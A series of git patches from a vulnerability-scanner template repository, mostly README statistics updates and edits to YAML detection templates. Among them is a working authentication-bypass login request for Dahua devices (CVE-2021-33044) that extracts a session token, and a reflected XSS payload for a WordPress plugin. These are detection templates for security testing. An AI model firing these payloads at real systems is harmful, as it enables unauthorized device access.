| | | +| pacsone | 1 | | | | | | | | | +| auth | 1 | | | | | | | | | +| stem | 1 | | | | | | | | | +| pivotaltracker | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index 7c569d4d19..57c3d4e612 100644 --- a/TOP-10.md +++ b/TOP-10.md @@ -1,12 +1,12 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 832 | daffainfo | 288 | cves | 836 | info | 750 | http | 2211 | +| cve | 833 | daffainfo | 288 | cves | 837 | info | 749 | http | 2211 | | lfi | 342 | pikpikcu | 281 | vulnerabilities | 327 | high | 649 | file | 50 | -| panel | 272 | dhiyaneshdk | 278 | exposed-panels | 270 | medium | 475 | network | 45 | +| panel | 272 | dhiyaneshdk | 279 | exposed-panels | 269 | medium | 476 | network | 45 | | xss | 258 | pdteam | 201 | technologies | 201 | critical | 294 | dns | 12 | | wordpress | 252 | geeknik | 162 | exposures | 191 | low | 155 | | | | exposure | 240 | dwisiswant0 | 131 | misconfiguration | 141 | | | | | | rce | 214 | gy741 | 81 | takeovers | 65 | | | | | -| tech | 197 | pussycat0x | 72 | token-spray | 63 | | | | | -| wp-plugin | 175 | princechaddha | 67 | default-logins | 60 | | | | | -| cve2020 | 164 | zzeitlin | 63 | file | 50 | | | | | +| tech | 196 | pussycat0x | 72 | token-spray | 63 | | | | | +| wp-plugin | 175 | princechaddha | 66 | default-logins | 60 | | | | | +| cve2020 | 165 | madrobot | 63 | file | 50 | | | | | From e10c3ff7dac2c23c006957c6a6dc844ba9d8902b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 18 Oct 2021 20:41:34 +0000 Subject: [PATCH 3015/4083] Auto README Update [Mon Oct 18 20:41:34 UTC 2021] :robot: --- README.md | 20 ++++++++++---------- 1 file changed, 10 insertions(+), 10 deletions(-) diff --git a/README.md b/README.md index 7c8bd1cd86..b485b2512e 100644 --- a/README.md +++ b/README.md @@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags, | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 827 | daffainfo | 288 | cves | 831 | info | 743 | http | 2195 | -| lfi | 337 | pikpikcu | 280 | vulnerabilities | 324 | high | 641 | file | 50 | -| panel | 267 | dhiyaneshdk | 273 | exposed-panels | 264 | medium | 474 | network | 45 | +| cve | 832 | daffainfo | 288 | cves | 836 | info | 750 | http | 2211 | +| lfi | 342 | pikpikcu | 281 | vulnerabilities | 327 | high | 649 | file | 50 | +| panel | 272 | dhiyaneshdk | 278 | exposed-panels | 270 | medium | 475 | network | 45 | | xss | 258 | pdteam | 201 | technologies | 201 | critical | 294 | dns | 12 | -| wordpress | 249 | geeknik | 162 | exposures | 191 | low | 155 | | | -| exposure | 239 | dwisiswant0 | 131 | misconfiguration | 139 | | | | | -| rce | 212 | gy741 | 81 | takeovers | 65 | | | | | -| tech | 195 | pussycat0x | 72 | token-spray | 63 | | | | | -| wp-plugin | 172 | princechaddha | 66 | default-logins | 60 | | | | | -| cve2020 | 164 | madrobot | 63 | file | 50 | | | | | +| wordpress | 252 | geeknik | 162 | exposures | 191 | low | 155 | | | +| exposure | 240 | dwisiswant0 | 131 | misconfiguration | 141 | | | | | +| rce | 214 | gy741 | 81 | takeovers | 65 | | | | | +| tech | 197 | pussycat0x | 72 | token-spray | 63 | | | | | +| wp-plugin | 175 | princechaddha | 67 | default-logins | 60 | | | | | +| cve2020 | 164 | zzeitlin | 63 | file | 50 | | | | | -**176 directories, 2381 files**. +**176 directories, 2382 files**. From db8a1bda6f7a1e8e1e24a751a70efdf9bca99b70 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 19 Oct 2021 02:23:08 +0530 Subject: [PATCH 3016/4083] workflow fix to run on release / create tag only --- .github/workflows/templates-stats.yml | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/.github/workflows/templates-stats.yml b/.github/workflows/templates-stats.yml index 22f43e7261..6132ebfa0b 100644 --- a/.github/workflows/templates-stats.yml +++ b/.github/workflows/templates-stats.yml @@ -2,14 +2,12 @@ name: 🗒 Templates Stats on: create: - tags: - - v* workflow_dispatch: jobs: build: runs-on: ubuntu-latest - if: github.repository == 'projectdiscovery/nuclei-templates' + if: ${{ startsWith(github.ref, 'refs/tags/v') }} steps: - uses: actions/checkout@master - uses: actions/setup-go@v2 From e6cd0981c106c0f279d515f3850efb122467349b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 18 Oct 2021 20:53:36 +0000 Subject: [PATCH 3017/4083] Auto README Update [Mon Oct 18 20:53:35 UTC 2021] :robot: --- README.md | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/README.md b/README.md index b485b2512e..9c53b7c938 100644 --- a/README.md +++ b/README.md @@ -42,16 +42,16 @@ An overview of the nuclei template project, including statistics on unique tags, | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 832 | daffainfo | 288 | cves | 836 | info | 750 | http | 2211 | +| cve | 833 | daffainfo | 288 | cves | 837 | info | 749 | http | 2211 | | lfi | 342 | pikpikcu | 281 | vulnerabilities | 327 | high | 649 | file | 50 | -| panel | 272 | dhiyaneshdk | 278 | exposed-panels | 270 | medium | 475 | network | 45 | +| panel | 272 | dhiyaneshdk | 279 | exposed-panels | 269 | medium | 476 | network | 45 | | xss | 258 | pdteam | 201 | technologies | 201 | critical | 294 | dns | 12 | | wordpress | 252 | geeknik | 162 | exposures | 191 | low | 155 | | | | exposure | 240 | dwisiswant0 | 131 | misconfiguration | 141 | | | | | | rce | 214 | gy741 | 81 | takeovers | 65 | | | | | -| tech | 197 | pussycat0x | 72 | token-spray | 63 | | | | | -| wp-plugin | 175 | princechaddha | 67 | default-logins | 60 | | | | | -| cve2020 | 164 | zzeitlin | 63 | file | 50 | | | | | +| tech | 196 | pussycat0x | 72 | token-spray | 63 | | | | | +| wp-plugin | 175 | princechaddha | 66 | default-logins | 60 | | | | | +| cve2020 | 165 | madrobot | 63 | file | 50 | | | | | **176 directories, 2382 files**. From 3175b12b22c56f192e7168e703dab9afaf27d3e7 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 19 Oct 2021 03:19:32 +0530 Subject: [PATCH 3018/4083] Additional matcher --- cves/2021/CVE-2021-3577.yaml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/cves/2021/CVE-2021-3577.yaml b/cves/2021/CVE-2021-3577.yaml index 17f750ee26..bb18f9d825 100644 --- a/cves/2021/CVE-2021-3577.yaml +++ b/cves/2021/CVE-2021-3577.yaml @@ -32,3 +32,7 @@ requests: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" + + - type: word + words: + - "set_city_timezone" \ No newline at end of file From c9f2ef68edb190553799d329b3a8afd57bf94584 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Mon, 18 Oct 2021 17:28:10 -0500 Subject: [PATCH 3019/4083] Update prometheus-config-endpoint.yaml --- exposures/configs/prometheus-config-endpoint.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/exposures/configs/prometheus-config-endpoint.yaml b/exposures/configs/prometheus-config-endpoint.yaml index 4529496b0d..4f23f90587 100644 --- a/exposures/configs/prometheus-config-endpoint.yaml +++ b/exposures/configs/prometheus-config-endpoint.yaml @@ -18,6 +18,8 @@ requests: - type: status status: - 200 + + - type: word words: - "job_name:" - "params:" From 667ee78cb5ead4e6a366e60c37290a03e85a7c1e Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Mon, 18 Oct 2021 23:09:27 -0300 Subject: [PATCH 3020/4083] Update sensitive-storage-exposure.yaml --- exposures/files/sensitive-storage-exposure.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposures/files/sensitive-storage-exposure.yaml b/exposures/files/sensitive-storage-exposure.yaml index 5db4e2330b..a65916dea3 100644 --- a/exposures/files/sensitive-storage-exposure.yaml +++ b/exposures/files/sensitive-storage-exposure.yaml @@ -15,6 +15,7 @@ requests: - "{{BaseURL}}/server/storage/" - "{{BaseURL}}/intikal/storage/" - "{{BaseURL}}/elocker_old/storage/" + stop-at-first-match: true matchers-condition: and matchers: - type: word From 69953cf73e7a2bffe1a9a1b1cf5939ae72bbe230 Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Mon, 18 Oct 2021 23:18:31 -0300 Subject: [PATCH 3021/4083] Update zenphoto-sensitive-info.yaml --- misconfiguration/zenphoto-sensitive-info.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/misconfiguration/zenphoto-sensitive-info.yaml b/misconfiguration/zenphoto-sensitive-info.yaml index 5f9225ea95..c5ecb3bf15 100644 --- a/misconfiguration/zenphoto-sensitive-info.yaml +++ b/misconfiguration/zenphoto-sensitive-info.yaml @@ -15,7 +15,8 @@ requests: - '{{BaseURL}}/zp/zp-core/setup/index.php' - '{{BaseURL}}/gallery/zp-core/setup/index.php' - '{{BaseURL}}/zp-core/setup/index.php' - + + stop-at-first-match: true matchers-condition: and matchers: - type: word From 02655a9f22835bcec6ab41dc9e5c8648ab6f308b Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Tue, 19 Oct 2021 12:44:56 +0900 Subject: [PATCH 3022/4083] Create CVE-2021-33044.yaml The identity authentication bypass vulnerability found in some Dahua products during the login process. Attackers can bypass device identity authentication by constructing malicious data packets. Signed-off-by: GwanYeong Kim --- cves/2021/CVE-2021-33044.yaml | 50 +++++++++++++++++++++++++++++++++++ 1 file changed, 50 insertions(+) create mode 100644 cves/2021/CVE-2021-33044.yaml diff --git a/cves/2021/CVE-2021-33044.yaml b/cves/2021/CVE-2021-33044.yaml new file mode 100644 index 0000000000..af32840093 --- /dev/null +++ b/cves/2021/CVE-2021-33044.yaml @@ -0,0 +1,50 @@ +id: CVE-2021-33044 + +info: + name: Dahua IPC/VTH/VTO devices Authentication Bypass + author: gy741 + severity: critical + tags: dahua,cve,cve2021,bypass + description: The identity authentication bypass vulnerability found in some Dahua products during the login process. Attackers can bypass device identity authentication by constructing malicious data packets. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-33044 + - https://github.com/dorkerdevil/CVE-2021-33044 + - https://seclists.org/fulldisclosure/2021/Oct/13 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-33044 + cwe-id: CWE-287 + +requests: + - raw: + - | + POST /RPC2_Login HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 + Accept-Encoding: gzip, deflate + Accept: application/json, text/javascript, */*; q=0.01 + Connection: close + X-Requested-With: XMLHttpRequest + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + Origin: http://{{Hostname}}/ + Referer: http://{{Hostname}}/ + Accept-Language: en-US,en;q=0.9 + + {"id": 1, "method": "global.login", "params": {"authorityType": "Default", "clientType": "NetKeyboard", "loginType": "Direct", "password": "Not Used", "passwordType": "Default", "userName": "admin"}, "session": 0} + + matchers-condition: and + matchers: + + - type: status + status: + - 200 + + - type: word + part: body + words: + - "true" + - "id" + - "params" + - "session" + condition: and From 6d5e933128fe1078f1ab833cdc54e08fd097fc4f Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Tue, 19 Oct 2021 12:56:40 +0300 Subject: [PATCH 3023/4083] Add description --- vulnerabilities/other/cs-cart-unauthenticated-lfi.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/cs-cart-unauthenticated-lfi.yaml b/vulnerabilities/other/cs-cart-unauthenticated-lfi.yaml index f175d20028..a098023ed9 100644 --- a/vulnerabilities/other/cs-cart-unauthenticated-lfi.yaml +++ b/vulnerabilities/other/cs-cart-unauthenticated-lfi.yaml @@ -4,6 +4,7 @@ info: name: CS-Cart unauthenticated LFI author: 0x_Akoko severity: high + description: A vulnerability in CS-Cart allows remote unauthenticated attackers to access locally stored files and reveal their content. reference: https://cxsecurity.com/issue/WLB-2020100100 tags: cscart,lfi From 5c910ab3b4d0f90907f4f4d9c31eda2600477023 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Tue, 19 Oct 2021 13:03:41 +0300 Subject: [PATCH 3024/4083] Add description --- vulnerabilities/other/luftguitar-arbitrary-file-upload.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/luftguitar-arbitrary-file-upload.yaml b/vulnerabilities/other/luftguitar-arbitrary-file-upload.yaml index 73c8f7c160..3fca056486 100644 --- a/vulnerabilities/other/luftguitar-arbitrary-file-upload.yaml +++ b/vulnerabilities/other/luftguitar-arbitrary-file-upload.yaml @@ -5,6 +5,7 @@ info: author: pikpikcu severity: high tags: luftguitar + description: A vulnerability in Luftguitar CMS allows remote unauthenticated users to upload files to the remote service via the 'ftb.imagegallery.aspx' endpoint. reference: https://www.exploit-db.com/exploits/14991 requests: From d1684e7d67e743a5144bc8aa6ddf1f0aec94ecaf Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Tue, 19 Oct 2021 13:10:29 +0300 Subject: [PATCH 3025/4083] Add description --- vulnerabilities/other/minimouse-lfi.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/minimouse-lfi.yaml b/vulnerabilities/other/minimouse-lfi.yaml index 2fe4f3ad61..22c5a7ef9a 100644 --- a/vulnerabilities/other/minimouse-lfi.yaml +++ b/vulnerabilities/other/minimouse-lfi.yaml @@ -4,6 +4,7 @@ info: name: Mini Mouse 9.2.0 - Path Traversal author: 0x_Akoko severity: high + description: A vulnerability in Mini Mouse allows remote unauthenticated attackers to include and disclose the content of locally stored files via the 'file' parameter. reference: https://www.exploit-db.com/exploits/49744 tags: minimouse,lfi From e45550f4edfac6548cddd7da049c5cfb1d8078ee Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Tue, 19 Oct 2021 13:10:34 +0300 Subject: [PATCH 3026/4083] Add description --- vulnerabilities/other/magicflow-lfi.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/magicflow-lfi.yaml b/vulnerabilities/other/magicflow-lfi.yaml index 19f61c01ef..08cf21df8d 100644 --- a/vulnerabilities/other/magicflow-lfi.yaml +++ b/vulnerabilities/other/magicflow-lfi.yaml @@ -4,6 +4,7 @@ info: name: MagicFlow - Local File Inclusion author: gy741 severity: critical + description: A vulnerability in MagicFlow allows remote unauthenticated users to access locally stored files on the server and return their content via the '/msa/main.xp' endpoint and the 'Fun' parameter. reference: https://www.seebug.org/vuldb/ssvid-89258 tags: magicflow,lfi From cfa3a798f3993de15c9b9a0413142bb2224f9352 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Tue, 19 Oct 2021 13:17:58 +0300 Subject: [PATCH 3027/4083] Add description --- vulnerabilities/other/lucee-xss.yaml | 1 + vulnerabilities/other/openvpn-hhi.yaml | 1 + 2 files changed, 2 insertions(+) diff --git a/vulnerabilities/other/lucee-xss.yaml b/vulnerabilities/other/lucee-xss.yaml index 63a273a8a0..dea08e0297 100644 --- a/vulnerabilities/other/lucee-xss.yaml +++ b/vulnerabilities/other/lucee-xss.yaml @@ -4,6 +4,7 @@ info: name: Lucee Unauthenticated Reflected XSS author: incogbyte severity: medium + description: A vulnerability in Lucee allows remote attackers to inject arbitrary Javascript into the responses returned by the server. tags: lucee,xss requests: diff --git a/vulnerabilities/other/openvpn-hhi.yaml b/vulnerabilities/other/openvpn-hhi.yaml index 2611426abb..7bcb4e1a2f 100644 --- a/vulnerabilities/other/openvpn-hhi.yaml +++ b/vulnerabilities/other/openvpn-hhi.yaml @@ -3,6 +3,7 @@ id: openvpn-hhi info: name: OpenVPN Host Header Injection author: twitter.com/Dheerajmadhukar + description: A vulnerability in OpenVPN Access Server allows remote attackers to inject arbitrary redirection URLs by using the 'Host' HTTP header field. severity: info tags: openvpn,hostheader-injection From 181dda73eceb25113f1ea9a3f609f9e6f590bdf6 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 19 Oct 2021 17:44:06 +0530 Subject: [PATCH 3028/4083] Update CVE-2021-33044.yaml --- cves/2021/CVE-2021-33044.yaml | 14 +++++++++----- 1 file changed, 9 insertions(+), 5 deletions(-) diff --git a/cves/2021/CVE-2021-33044.yaml b/cves/2021/CVE-2021-33044.yaml index af32840093..7797b9e08e 100644 --- a/cves/2021/CVE-2021-33044.yaml +++ b/cves/2021/CVE-2021-33044.yaml @@ -4,32 +4,29 @@ info: name: Dahua IPC/VTH/VTO devices Authentication Bypass author: gy741 severity: critical - tags: dahua,cve,cve2021,bypass description: The identity authentication bypass vulnerability found in some Dahua products during the login process. Attackers can bypass device identity authentication by constructing malicious data packets. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2021-33044 - https://github.com/dorkerdevil/CVE-2021-33044 + - https://nvd.nist.gov/vuln/detail/CVE-2021-33044 - https://seclists.org/fulldisclosure/2021/Oct/13 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 cve-id: CVE-2021-33044 cwe-id: CWE-287 + tags: dahua,cve,cve2021,auth-bypass requests: - raw: - | POST /RPC2_Login HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 - Accept-Encoding: gzip, deflate Accept: application/json, text/javascript, */*; q=0.01 Connection: close X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://{{Hostname}}/ Referer: http://{{Hostname}}/ - Accept-Language: en-US,en;q=0.9 {"id": 1, "method": "global.login", "params": {"authorityType": "Default", "clientType": "NetKeyboard", "loginType": "Direct", "password": "Not Used", "passwordType": "Default", "userName": "admin"}, "session": 0} @@ -48,3 +45,10 @@ requests: - "params" - "session" condition: and + + extractors: + - type: regex + group: 1 + part: body + regex: + - ',"result":true,"session":"([a-z]+)"\}' From 52e498506ecbc88a80365d33a4276881bfe7de77 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 19 Oct 2021 17:45:19 +0530 Subject: [PATCH 3029/4083] Update zenphoto-sensitive-info.yaml --- misconfiguration/zenphoto-sensitive-info.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/misconfiguration/zenphoto-sensitive-info.yaml b/misconfiguration/zenphoto-sensitive-info.yaml index c5ecb3bf15..b3ba0c441a 100644 --- a/misconfiguration/zenphoto-sensitive-info.yaml +++ b/misconfiguration/zenphoto-sensitive-info.yaml @@ -15,7 +15,7 @@ requests: - '{{BaseURL}}/zp/zp-core/setup/index.php' - '{{BaseURL}}/gallery/zp-core/setup/index.php' - '{{BaseURL}}/zp-core/setup/index.php' - + stop-at-first-match: true matchers-condition: and matchers: From 7016e71473d91a1474dce3bafeda19f7df6802f7 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 19 Oct 2021 20:27:46 +0530 Subject: [PATCH 3030/4083] Update prometheus-config-endpoint.yaml --- exposures/configs/prometheus-config-endpoint.yaml | 12 ++++++++---- 1 file changed, 8 insertions(+), 4 deletions(-) diff --git a/exposures/configs/prometheus-config-endpoint.yaml b/exposures/configs/prometheus-config-endpoint.yaml index 4f23f90587..7b6150eb2e 100644 --- a/exposures/configs/prometheus-config-endpoint.yaml +++ b/exposures/configs/prometheus-config-endpoint.yaml @@ -21,8 +21,12 @@ requests: - type: word words: - - "job_name:" - - "params:" - - "module:" - - "targets:" + - 'job_name:' + - '{"status":"success","data":' + - 'targets:' condition: and + + - type: word + part: header + words: + - 'application/json' From 10c23143675134c9207b71ad12437950cd40cd38 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 19 Oct 2021 20:32:37 +0530 Subject: [PATCH 3031/4083] Update prometheus-flags-endpoint.yaml --- exposures/configs/prometheus-flags-endpoint.yaml | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/exposures/configs/prometheus-flags-endpoint.yaml b/exposures/configs/prometheus-flags-endpoint.yaml index c249c865f3..3f139d1ec3 100644 --- a/exposures/configs/prometheus-flags-endpoint.yaml +++ b/exposures/configs/prometheus-flags-endpoint.yaml @@ -3,9 +3,9 @@ id: prometheus-flags-endpoint info: name: Exposure of sensitive operational information via Prometheus flags API endpoint author: geeknik + severity: medium description: The flags endpoint provides a full path to the configuration file. If the file is stored in the home directory, it may leak a username. reference: https://jfrog.com/blog/dont-let-prometheus-steal-your-fire/ - severity: medium tags: prometheus,exposure requests: @@ -23,6 +23,11 @@ requests: - '"config.file":' condition: and + - type: word + part: header + words: + - 'application/json' + extractors: - type: regex name: web_admin_enabled From 8d36ebe1d6082bb8660c58405e873397c4f21e0a Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 19 Oct 2021 20:32:48 +0530 Subject: [PATCH 3032/4083] Update prometheus-config-endpoint.yaml --- exposures/configs/prometheus-config-endpoint.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposures/configs/prometheus-config-endpoint.yaml b/exposures/configs/prometheus-config-endpoint.yaml index 7b6150eb2e..b454c38383 100644 --- a/exposures/configs/prometheus-config-endpoint.yaml +++ b/exposures/configs/prometheus-config-endpoint.yaml @@ -3,9 +3,9 @@ id: prometheus-config-endpoint info: name: Exposure of sensitive operational information via Prometheus config API endpoint author: geeknik + severity: high description: The config endpoint returns the loaded Prometheus configuration file. This file also contains addresses of targets and alerting/discovery services alongside the credentials required to access them. Usually, Prometheus replaces the passwords in the credentials config configuration field with the placeholder (although this still leaks the username). reference: https://jfrog.com/blog/dont-let-prometheus-steal-your-fire/ - severity: high tags: prometheus,exposure requests: From 2893847959dfa12c2cc4eaec0c4c00207dfba865 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 19 Oct 2021 20:34:13 +0530 Subject: [PATCH 3033/4083] Update prometheus-flags-endpoint.yaml --- exposures/configs/prometheus-flags-endpoint.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/exposures/configs/prometheus-flags-endpoint.yaml b/exposures/configs/prometheus-flags-endpoint.yaml index 3f139d1ec3..2f4110f253 100644 --- a/exposures/configs/prometheus-flags-endpoint.yaml +++ b/exposures/configs/prometheus-flags-endpoint.yaml @@ -18,6 +18,8 @@ requests: - type: status status: - 200 + + - type: word words: - '"data":' - '"config.file":' From 6d13118df62b541c0648b16da09ff59d77d6e002 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 19 Oct 2021 20:35:34 +0530 Subject: [PATCH 3034/4083] Update prometheus-targets-endpoint.yaml --- exposures/configs/prometheus-targets-endpoint.yaml | 14 ++++++++++---- 1 file changed, 10 insertions(+), 4 deletions(-) diff --git a/exposures/configs/prometheus-targets-endpoint.yaml b/exposures/configs/prometheus-targets-endpoint.yaml index 9d29d621c6..e5adf58b1a 100644 --- a/exposures/configs/prometheus-targets-endpoint.yaml +++ b/exposures/configs/prometheus-targets-endpoint.yaml @@ -3,9 +3,9 @@ id: prometheus-targets-endpoint info: name: Exposure of sensitive operational information via Prometheus targets API endpoint author: geeknik + severity: high description: The targets endpoint exposes services belonging to the infrastructure, including their roles and labels. In addition to showing the target machine addresses, the endpoint also exposes metadata labels that are added by the target provider. These labels are intended to contain non-sensitive values, like the name of the server or its description, but various cloud platforms may automatically expose sensitive data in these labels, oftentimes without the developer’s knowledge. reference: https://jfrog.com/blog/dont-let-prometheus-steal-your-fire/ - severity: high tags: prometheus,exposure requests: @@ -18,8 +18,14 @@ requests: - type: status status: - 200 + + - type: word words: - - "Endpoint" - - "State" - - "Labels" + - '{"status":"success","data":' + - 'Labels' condition: and + + - type: word + part: header + words: + - 'application/json' From 8ac553e84409ee610e50c1f1cb944ecf48e1b931 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Tue, 19 Oct 2021 22:21:58 +0700 Subject: [PATCH 3035/4083] Create CVE-2016-1000143.yaml --- cves/2016/CVE-2016-1000143.yaml | 32 ++++++++++++++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 cves/2016/CVE-2016-1000143.yaml diff --git a/cves/2016/CVE-2016-1000143.yaml b/cves/2016/CVE-2016-1000143.yaml new file mode 100644 index 0000000000..95cc66fabf --- /dev/null +++ b/cves/2016/CVE-2016-1000143.yaml @@ -0,0 +1,32 @@ +id: CVE-2016-1000143 + +info: + name: Photoxhibit v2.1.8 - Unauthenticated Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: Reflected XSS in wordpress plugin photoxhibit v2.1.8 + reference: + - http://www.vapidlabs.com/wp/wp_advisory.php?v=780 + - https://nvd.nist.gov/vuln/detail/CVE-2016-1000143 + tags: cve,cve2016,wordpress,wp-plugin,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/photoxhibit/common/inc/pages/build.php?gid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - '' + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From a25a9f302007ed9c0906f6ca635c94d67d9eb608 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 19 Oct 2021 22:25:44 +0530 Subject: [PATCH 3036/4083] Update prometheus-targets-endpoint.yaml --- exposures/configs/prometheus-targets-endpoint.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/exposures/configs/prometheus-targets-endpoint.yaml b/exposures/configs/prometheus-targets-endpoint.yaml index e5adf58b1a..cd326bed1c 100644 --- a/exposures/configs/prometheus-targets-endpoint.yaml +++ b/exposures/configs/prometheus-targets-endpoint.yaml @@ -1,9 +1,9 @@ id: prometheus-targets-endpoint info: - name: Exposure of sensitive operational information via Prometheus targets API endpoint + name: Prometheus targets API endpoint author: geeknik - severity: high + severity: info description: The targets endpoint exposes services belonging to the infrastructure, including their roles and labels. In addition to showing the target machine addresses, the endpoint also exposes metadata labels that are added by the target provider. These labels are intended to contain non-sensitive values, like the name of the server or its description, but various cloud platforms may automatically expose sensitive data in these labels, oftentimes without the developer’s knowledge. reference: https://jfrog.com/blog/dont-let-prometheus-steal-your-fire/ tags: prometheus,exposure From 1d70ac6ccbed1fb428955062d72d3f6e3fc08951 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 19 Oct 2021 22:26:31 +0530 Subject: [PATCH 3037/4083] Update prometheus-flags-endpoint.yaml --- exposures/configs/prometheus-flags-endpoint.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/exposures/configs/prometheus-flags-endpoint.yaml b/exposures/configs/prometheus-flags-endpoint.yaml index 2f4110f253..0cefa431fc 100644 --- a/exposures/configs/prometheus-flags-endpoint.yaml +++ b/exposures/configs/prometheus-flags-endpoint.yaml @@ -1,9 +1,9 @@ id: prometheus-flags-endpoint info: - name: Exposure of sensitive operational information via Prometheus flags API endpoint + name: Prometheus flags API endpoint author: geeknik - severity: medium + severity: info description: The flags endpoint provides a full path to the configuration file. If the file is stored in the home directory, it may leak a username. reference: https://jfrog.com/blog/dont-let-prometheus-steal-your-fire/ tags: prometheus,exposure From 8a698222851ce804e558d5c68ddab013e6b627ca Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 19 Oct 2021 22:26:52 +0530 Subject: [PATCH 3038/4083] Update prometheus-config-endpoint.yaml --- exposures/configs/prometheus-config-endpoint.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/exposures/configs/prometheus-config-endpoint.yaml b/exposures/configs/prometheus-config-endpoint.yaml index b454c38383..bfc9ce9b45 100644 --- a/exposures/configs/prometheus-config-endpoint.yaml +++ b/exposures/configs/prometheus-config-endpoint.yaml @@ -1,9 +1,9 @@ id: prometheus-config-endpoint info: - name: Exposure of sensitive operational information via Prometheus config API endpoint + name: Prometheus config API endpoint author: geeknik - severity: high + severity: info description: The config endpoint returns the loaded Prometheus configuration file. This file also contains addresses of targets and alerting/discovery services alongside the credentials required to access them. Usually, Prometheus replaces the passwords in the credentials config configuration field with the placeholder (although this still leaks the username). reference: https://jfrog.com/blog/dont-let-prometheus-steal-your-fire/ tags: prometheus,exposure From 9470c1bb09ea172666a2702bb7d575ee3633d363 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 19 Oct 2021 23:47:54 +0530 Subject: [PATCH 3039/4083] Create heatmiser-wifi-thermostat.yaml --- iot/heatmiser-wifi-thermostat.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 iot/heatmiser-wifi-thermostat.yaml diff --git a/iot/heatmiser-wifi-thermostat.yaml b/iot/heatmiser-wifi-thermostat.yaml new file mode 100644 index 0000000000..3426a7ebf4 --- /dev/null +++ b/iot/heatmiser-wifi-thermostat.yaml @@ -0,0 +1,24 @@ +id: heatmiser-wifi-thermostat + +info: + name: Heatmiser Wifi Thermostat + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/7445 + tags: iot + metadata: + shodan: 'http.title:"Heatmiser Wifi 